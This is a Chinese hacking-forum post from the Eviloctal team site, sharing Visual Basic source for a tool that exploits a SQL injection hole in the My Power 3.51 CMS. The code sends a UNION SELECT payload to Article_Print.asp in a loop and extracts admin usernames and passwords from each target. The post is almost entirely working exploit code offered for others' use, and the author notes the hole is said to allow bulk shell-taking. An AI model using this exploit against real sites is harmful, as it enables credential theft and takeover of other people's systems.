[原创]vb实现编写My power 3.51的注入漏洞利用程序
文章作者:阿〓☆〓狼文章来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
呵呵,听朋友说my power 3.51 出了最新的注入漏洞,说可以批量拿shell,但是我没有拿到利用程序,也没有拿到漏洞文章。就硬着头皮看了下代码。真让我找着了,就顺便写了工具,用vb写的~~
下面是主要代码:
[code]Option Explicit
Dim FURL As String
Dim fileno, stemp, pagecode, httpheader, B, C, A, lenp, d, i, e
Private Sub Command1_Click()
If Text1.Text = "" Then
MsgBox "请输入网址"
GoTo AAA
Else
FURL = Trim$(Text1.Text)
End If
Text2.Text = ""
For i = 1 To 100
Inet1.Execute FURL & "Article_Print.asp", "Post", _
"ArticleID=1000%20union%20(select%20top%201%201,1,'fuser:'%2busername%2bchr(124),'fpass:'%2bpassword%2bchr(124),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20(select%20top%20" & i _
& "%20username,password%20from%20admin%20order%20by%20username)%20order%20by%20username%20desc)", _
"Content-Type: application/x-www-form-urlencoded "
Do Until Inet1.StillExecuting = False '阻塞前面的Inet1
DoEvents
Loop
pagecode = ""
stemp = Inet1.GetChunk(1024)
Do While stemp <> ""
pagecode = pagecode + stemp
stemp = Inet1.GetChunk(1024)
Loop
httpheader = InStr(1, pagecode, _
"fuser", 1)
lenp = InStr(1, pagecode, _
"fpass", 1)
C = ""
B = ""
If httpheader <> 0 Then
For A = httpheader + 6 To httpheader + 25
If Asc(Mid(pagecode, A, 1)) <> 124 Then
B = B & Mid(pagecode, A, 1)
Else
Exit For
End If
Next
End If
If lenp <> 0 Then
For A = lenp + 6 To lenp + 25
If Asc(Mid(pagecode, A, 1)) <> 124 Then
C = C & Mid(pagecode, A, 1)
Else
Exit For
End If
Next
End If
If B = d Then
Exit For
End If
d = B
Text2.Text = Text2.Text & "用户:" & B & " " & "密码:" & C & vbCrLf
Next
AAA:
End Sub
Private Sub Command3_Click()
End
End Sub
[/code]
这个代码我就不多解释了,呵呵,发来这里给大家分享下,有错误的地方还忘指出。
呵呵,这个软件早写好了,听说网络上已经有比我早的利用工具了,就给发出来了。
页:
[1]